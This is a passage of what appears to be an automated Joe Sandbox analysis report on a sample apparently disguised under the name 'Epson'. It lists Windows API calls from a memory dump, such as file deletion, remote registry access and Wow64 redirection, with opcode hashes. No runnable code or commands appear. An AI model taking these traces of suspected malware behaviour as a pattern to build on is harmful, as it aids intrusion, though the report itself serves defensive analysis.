                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F75110
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F7508E,?,?,00F7502E,?,010198D8,0000000C,00F75185,?,00000002,00000000), ref: 00F75133
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 3be2ac900fa785df92046204491eb895b5cf4facbab724a3cce276c584d91cc1
                                                                                                                                                                                                                                      • Instruction ID: bbd23ac49dabe3c09b2d566e74eab638ec98a776d9ed4171fe1a814d44255ed7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be2ac900fa785df92046204491eb895b5cf4facbab724a3cce276c584d91cc1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F04431A0020CBFDB115F94DC49BADBBB4EF04B66F404069F909A6560DBB59A40EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 00FAE785
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FAE797
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FAE7BD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                      • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                      • Opcode ID: e5ef923ac45689eaeaf111a78f3d94c9c75a277fec8067ab8e4e0d0a78da40fa
                                                                                                                                                                                                                                      • Instruction ID: b1346dbf0912e5118799bad38a3ba8196686687f1e80e30a3370413c0e5cb0d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5ef923ac45689eaeaf111a78f3d94c9c75a277fec8067ab8e4e0d0a78da40fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF02BF2D215609FE73557208C84F6936246F23704B200999F842FB120DB34CD44FB44
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F5668B,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F5664A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F5665C
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F5668B,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F5666E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                      • Opcode ID: a1312489a56a0cb5350518f7617fbae80be892be417b698eb23bdf3b61ed06f9
                                                                                                                                                                                                                                      • Instruction ID: 7f74231af955da91d1e10462d18eda4f473f502ede689ef658384791b69c766b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1312489a56a0cb5350518f7617fbae80be892be417b698eb23bdf3b61ed06f9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0CD35A0152217A3111726BC0CB5E75289F82F3BB050219FD10DF514DF58CC05A4E5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F95657,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F56610
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F56622
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F95657,?,?,00F562FA,?,00000001,?,?,00000000), ref: 00F56635
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                      • Opcode ID: 8e2321c2cdc5c7b8e425bb38f5765c02d1e7bbd79fa3628ab962f7c828a93a16
                                                                                                                                                                                                                                      • Instruction ID: 9292b2ce6978bda77b8bed8d990f9e88bab5b6be9b387629b86748d38c61581a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e2321c2cdc5c7b8e425bb38f5765c02d1e7bbd79fa3628ab962f7c828a93a16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0D02B31B025715B523227257C0898F3B249FD1F363450015FD10EF524CF28CC05E1D8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FC35C4
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00FC3646
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FC365C
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FC366D
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FC367F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3226157194-0
                                                                                                                                                                                                                                      • Opcode ID: c2aadb4870fd503f19a3dd25ff2d597ea7c6c84e80f96089ded0a56750f63609
                                                                                                                                                                                                                                      • Instruction ID: e93c50f538f9cab35d95e88935c73cec653c976f7156e37242d506c136ffe33f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2aadb4870fd503f19a3dd25ff2d597ea7c6c84e80f96089ded0a56750f63609
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B17072D00119ABDF11DBA4CD86FDEBB7CEF48354F4080AAF609E7141EA349B44AB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00FDAE87
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FDAE95
                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FDAEC8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FDB09D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                                                                                      • Opcode ID: 9e5414d6d087431d858b56ab55224d9a4c70984bc0243135c6197c6a15bfb4d6
                                                                                                                                                                                                                                      • Instruction ID: f39f9d18c79be6ccfb1721efcbe914eb96d04f4847ebd7d1cc6338b5e3dc9110
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5414d6d087431d858b56ab55224d9a4c70984bc0243135c6197c6a15bfb4d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57A1AF71A04301AFE720DF24C886F2AB7E5AF44720F18885DF9999B392DB75EC45DB81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FDC10E,?,?), ref: 00FDD415
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD451
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4C8
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4FE
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FDC505
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FDC560
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FDC5C3
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00FDC606
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDC613
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                                                                                                      • Opcode ID: 541bcb675f38b2d75551936378c1c37d4f3cdead8d5a1e277571d88419feb863
                                                                                                                                                                                                                                      • Instruction ID: a4a70a46fe33d85b99b7d52520778e36486b20c491d640b4d42d84b9d55a60ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 541bcb675f38b2d75551936378c1c37d4f3cdead8d5a1e277571d88419feb863
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61AF31608242AFC314DF14C890F2ABBE5FF84318F58859DF5998B292DB31ED46EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FBE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FBD7CD,?), ref: 00FBE714
                                                                                                                                                                                                                                        • Part of subcall function 00FBE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FBD7CD,?), ref: 00FBE72D
                                                                                                                                                                                                                                        • Part of subcall function 00FBEAB0: GetFileAttributesW.KERNEL32(?,00FBD840), ref: 00FBEAB1
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FBED8A
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00FBEDC3
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBEF02
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBEF1A
                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00FBEF67
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                                                                                                      • Opcode ID: ff605132d96d7fd9ba0cea080aa9c4d28837c8dcc5d0165b49bae5903f34873e
                                                                                                                                                                                                                                      • Instruction ID: 574a7e05addf3e17b5d79e60b6079e44ad903507495dffdfcb7298a3dbdfdc45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff605132d96d7fd9ba0cea080aa9c4d28837c8dcc5d0165b49bae5903f34873e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B5170B25083859BC724EB95CC81DDBB3ECEF84310F40492EF689D3151EF75A6889B66
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00FB9534
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 00FB95A5
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 00FB9604
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FB9677
                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FB96A2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                                                                                      • Opcode ID: 21ad6f0d9c1379aebf5a1706f382d642b4ecb714d0a0bd9795e37112b68eec8b
                                                                                                                                                                                                                                      • Instruction ID: 55f50de538b0ae9f39bc66dbed8fad9d2c4712c128de6913b40a06f672c67bef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21ad6f0d9c1379aebf5a1706f382d642b4ecb714d0a0bd9795e37112b68eec8b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 945168B5A04219EFCB10CF69C884EAAB7F9FF88310B158559EA09DB350E774E911CF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FC95F3
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00FC961F
                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FC9677
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FC969C
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FC96A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                                                                                      • Opcode ID: 1a7ac2c108434b6f2196889155858d700835ba4c4d817f646da6e5f0179237a2
                                                                                                                                                                                                                                      • Instruction ID: 252e2833d72a917c9634f37f0a89cc8e94459c12a3dd5bd7e57aab8ee3e2cfbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7ac2c108434b6f2196889155858d700835ba4c4d817f646da6e5f0179237a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E513A35A00219AFCB05DF64C885E6ABBF5FF48354F048058E949AB3A2CB75ED45EF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FD999D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FD9A2D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FD9A49
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FD9A8F
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FD9AAF
                                                                                                                                                                                                                                        • Part of subcall function 00F6F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00FC1A02,?,7529E610), ref: 00F6F9F1
                                                                                                                                                                                                                                        • Part of subcall function 00F6F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00FB0354,00000000,00000000,?,?,00FC1A02,?,7529E610,?,00FB0354), ref: 00F6FA18
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 666041331-0
                                                                                                                                                                                                                                      • Opcode ID: 392d56c83d1c1178a85b9c04db4be767f6cbc762713a2b899a4da3ab062410f1
                                                                                                                                                                                                                                      • Instruction ID: 743bff124257c9d24da37f10332ef4cc6753b30050542c0d898291ed0de9e13b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 392d56c83d1c1178a85b9c04db4be767f6cbc762713a2b899a4da3ab062410f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58517C35A04205DFCB01DFA8C4909ADBBF1FF09324B098199E90A9B722D775ED86DF81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FE766B
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00FE7682
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FE76AB
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00FCB5BE,00000000,00000000), ref: 00FE76D0
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FE76FF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3688381893-0
                                                                                                                                                                                                                                      • Opcode ID: 631fb889ef4c4a94890f8a637bb2ec63a4c9a6c8817f881193072070460586d0
                                                                                                                                                                                                                                      • Instruction ID: ae68efe5721663d9f4d21525bda60a3e74a83ba0b7236a5d8d91c7d05e4a3987
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 631fb889ef4c4a94890f8a637bb2ec63a4c9a6c8817f881193072070460586d0
